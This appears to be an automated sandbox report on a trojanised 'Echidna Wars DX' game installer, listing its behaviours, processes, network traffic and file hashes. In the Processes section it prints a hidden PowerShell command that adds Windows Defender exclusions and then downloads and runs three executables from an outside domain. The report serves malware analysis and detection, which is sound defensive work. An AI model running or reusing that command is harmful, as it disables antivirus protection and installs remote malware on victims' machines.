Analysis Overview
SHA256
0918c46a1fbac3b7cc6dc24fabf6cf053ddeffb9bc4921714fc210050e511d29
Threat Level: Shows suspicious behavior
The file Setup.exe was found to be: Shows suspicious behavior.
Malicious Activity Summary
Executes dropped EXE
Loads dropped DLL
Checks installed software on the system
Unsigned PE
Program crash
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SetWindowsHookEx
Runs net.exe
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-02-22 20:19
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-02-22 20:18
Reported
2024-02-22 20:21
Platform
win10-20240221-en
Max time kernel
64s
Max time network
77s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-MH2N8.tmp\Setup.tmp | N/A |
| N/A | N/A | C:\Echidna Wars DX\Game.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Echidna Wars DX\Game.exe | N/A |
| N/A | N/A | C:\Echidna Wars DX\Game.exe | N/A |
| N/A | N/A | C:\Echidna Wars DX\Game.exe | N/A |
| N/A | N/A | C:\Echidna Wars DX\Game.exe | N/A |
| N/A | N/A | C:\Echidna Wars DX\Game.exe | N/A |
| N/A | N/A | C:\Echidna Wars DX\Game.exe | N/A |
Checks installed software on the system
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Echidna Wars DX\Game.exe |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-MH2N8.tmp\Setup.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-MH2N8.tmp\Setup.tmp | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
|---|---|---|---|
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: 33 | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-MH2N8.tmp\Setup.tmp | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Echidna Wars DX\Game.exe | N/A |
| N/A | N/A | C:\Echidna Wars DX\Game.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\Setup.exe"
C:\Users\Admin\AppData\Local\Temp\is-MH2N8.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-MH2N8.tmp\Setup.tmp" /SL5="$80200,44691089,844288,C:\Users\Admin\AppData\Local\Temp\Setup.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C ""C:\Echidna Wars DX\config.bat""
C:\Windows\SysWOW64\net.exe
net session
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 session
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle hidden Add-MpPreference -ExclusionPath C:\Users;Add-MpPreference -ExclusionPath $env:ProgramFiles;cd C:\Users\Public;Invoke-WebRequest https://jeuxviddeo.com/V1 -OutFile V1.exe;./V1.exe;Invoke-WebRequest https://jeuxviddeo.com/Q -OutFile Q.exe;./Q.exe;Invoke-WebRequest https://jeuxviddeo.com/A -OutFile A.exe;./A.exe;exit
C:\Echidna Wars DX\Game.exe
"C:\Echidna Wars DX\Game.exe"
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x2f4
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4500 -s 772
Network
| Country | Destination | Domain | Proto |
|---|---|---|---|
| GB | 96.16.110.114:80 | | tcp |
| US | 8.8.8.8:53 | jeuxviddeo.com | udp |
Files
memory/3992-0-0x0000000000400000-0x00000000004DB000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-MH2N8.tmp\Setup.tmp
| MD5 | 9665ccc8017eab35c9bea56ab727692a |
| SHA1 | 177a4d25e994e3a5e792360ce1ef48a25c9600e3 |
| SHA256 | dc06f837689227d615d587bd7405ab6ec327579cd0f8995f9072d559b4e45c4c |
| SHA512 | df5fe843347445d75ee89690c336090b2a179a2d752111a6023a6e95abcdc19651774977e4f673ee54ba21295d2aaf3ab7b3e7b0b0449f1f0b6601cdd76a5ce5 |
memory/4100-5-0x00000000009B0000-0x00000000009B1000-memory.dmp
memory/3992-12-0x0000000000400000-0x00000000004DB000-memory.dmp
memory/4100-15-0x0000000000400000-0x0000000000717000-memory.dmp
C:\Echidna Wars DX\Game.exe
| MD5 | 5769be658b2478d3d437c152adec05cf |
| SHA1 | 9794744bd45a038641f219ecefd31fa2e239ebbd |
| SHA256 | 4df2f34e9a3df933f92cde41e6d717796267690941c2f4aac3cdfa1f607efb8e |
| SHA512 | 8491e204b4c13cd2436ee02f2dd71991e3e06047a2eec02f65bca08d155202f3fc996f80cdd919607e253ba0d9d8753dd6489acf8bb66933321542d1fd5fe06e |
C:\Echidna Wars DX\config.bat
| MD5 | 62f9201f9ed75ebef04946bcdf72d95a |
| SHA1 | 5779fad609e0c77363e6436230954243c29c9205 |
| SHA256 | f92075a480c98a4499c52baa308e2dfda3a78b1f52f909fbc6f5d2da77d99847 |
| SHA512 | ae9690f244eee39ce39fdbc00af9e7b1a31da97e6325cd8dd465ae6288df2fe712fe8a6790d03df6bd0e244fb7e31eb0203237759f662286942a276667247806 |
memory/4600-70-0x00000000727A0000-0x0000000072E8E000-memory.dmp
memory/4600-71-0x0000000007130000-0x0000000007140000-memory.dmp
memory/4600-72-0x0000000004A50000-0x0000000004A86000-memory.dmp
memory/4600-73-0x0000000007770000-0x0000000007D98000-memory.dmp
memory/4100-75-0x0000000000400000-0x0000000000717000-memory.dmp
memory/3992-76-0x0000000000400000-0x00000000004DB000-memory.dmp
memory/4600-77-0x00000000073E0000-0x0000000007402000-memory.dmp
memory/4600-79-0x0000000007E70000-0x0000000007ED6000-memory.dmp
memory/4600-78-0x0000000007580000-0x00000000075E6000-memory.dmp
memory/4600-80-0x0000000007EE0000-0x0000000008230000-memory.dmp
memory/4600-83-0x00000000071A0000-0x00000000071BC000-memory.dmp
memory/4600-84-0x0000000008720000-0x000000000876B000-memory.dmp
memory/4600-85-0x00000000085A0000-0x0000000008616000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qjmxpfe2.ck4.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/4600-102-0x000000007F470000-0x000000007F480000-memory.dmp
memory/4600-103-0x0000000009450000-0x0000000009483000-memory.dmp
memory/4600-104-0x00000000742C0000-0x000000007430B000-memory.dmp
memory/4600-105-0x0000000009490000-0x00000000094AE000-memory.dmp
memory/4600-110-0x00000000094B0000-0x0000000009555000-memory.dmp
memory/4600-111-0x0000000007130000-0x0000000007140000-memory.dmp
memory/4600-112-0x00000000099C0000-0x0000000009A54000-memory.dmp
C:\Echidna Wars DX\Game.exe
| MD5 | 7de3741fb79dcfa8df54a4daa90c8692 |
| SHA1 | 8003f910997a50719d55ff098f42a23d13598b08 |
| SHA256 | 86b7090e9f7f8f054bb17045339c523236d491c6629344ab15df824bd45df90b |
| SHA512 | 31f2c524a3dfd22d0563e87ba113b5c70439735994d6a386f58d369cfc2180588db21dbfd8b30d32ed966039f3e2416cf9fae9ef5ba57a26ff978eab5a5f3e3c |
C:\Echidna Wars DX\Game.exe
| MD5 | 4e26e69b1622efa982a86cbe2edd5801 |
| SHA1 | 8d75b18942f4ab79e29457d12d47cb7bb8763612 |
| SHA256 | 4251e3565483374fdea28757873a688b89c91b0558d26d099b855321a1147472 |
| SHA512 | 2f7118a015524142eb704f992d32e16edb34a82217a8956b041a7ef7b2927c3adcbe5797baa25f03388835c38c673315667265b6620471233ab738a586c9bfe7 |
C:\Echidna Wars DX\ovplay.dll
| MD5 | def47290ed52d7ce0a2e65e8ffac95a2 |
| SHA1 | 0edc4bb840d995a5d80f1cd15026e655c817a6ce |
| SHA256 | 558fd9b141f343a81cc76e653ecdb051b4621ce022d1e8af49142831e56371fc |
| SHA512 | 469492d4762acc92674ad3f173b05cb974bca1dfcc046e9117de644cd4326cdf7edd1e6bd6dfd1fd2400a1bcaff178f56c068c2fa2f9866431bdfc22e3eaf208 |
\Echidna Wars DX\hmm.dll
| MD5 | 401a237f4e02457713382b2413a4800c |
| SHA1 | fcddfc03d93011efb0e0910c456aa47f2e632057 |
| SHA256 | 5eed0341f3399b833d56402bf4b9c67bae6469e099ee0b802e9ebee428550565 |
| SHA512 | 443932fb5cde7ac0b69b4e738740ac11b1b9ea0b6f33d0d3111644291b1f9b92e9c4f501dc98abacc565a67e8e9019c030e8a579d86dc462fe07120da223eb61 |
C:\Echidna Wars DX\hspda.dll
| MD5 | 88735cdf603d77cceef556215e43a45f |
| SHA1 | 47a4d364015a3f17143978b32aeb35220c54cb0a |
| SHA256 | 0ca312452a187f574090831707734f3858212a9dd143d18dbd56239e9b438212 |
| SHA512 | 06995af0a42d7d1e4af83e9d63589b0148caa60b9ea44b5b5fcf877bf9a5a629416ededfab30c0ee224a1caab817cdc6cc3ddb53fcf0e77effa44ef629d40d71 |
memory/4500-166-0x0000000000630000-0x0000000000642000-memory.dmp
memory/4500-170-0x0000000000650000-0x000000000068C000-memory.dmp
\Echidna Wars DX\hspogg.dll
| MD5 | 8c44de023765b683fce13c7d17a00add |
| SHA1 | b5256452df6f534057271a8cd1df817ce3a5bbe7 |
| SHA256 | 02859dd4efc1920a848a55215de439dc00c5c09c5b609c5ca1421914a3d43cd8 |
| SHA512 | ae316ed8b11968351510a3c8e4cf524a4f6b645e38a8947e9199b7ce059ea4570f01b976e1a520a18373d19e9fdeda096aab53f71268b8f20f54f406001076d2 |
memory/4500-238-0x0000000010100000-0x0000000010126000-memory.dmp
memory/4600-330-0x00000000098C0000-0x00000000098DA000-memory.dmp
memory/4600-335-0x00000000098B0000-0x00000000098B8000-memory.dmp
memory/4600-354-0x0000000009920000-0x000000000993A000-memory.dmp
memory/4600-355-0x0000000009970000-0x0000000009992000-memory.dmp
memory/4600-356-0x000000000A060000-0x000000000A55E000-memory.dmp
memory/4600-361-0x000000000ABE0000-0x000000000B258000-memory.dmp
memory/4600-464-0x00000000727A0000-0x0000000072E8E000-memory.dmp
memory/4500-469-0x0000000010100000-0x0000000010126000-memory.dmp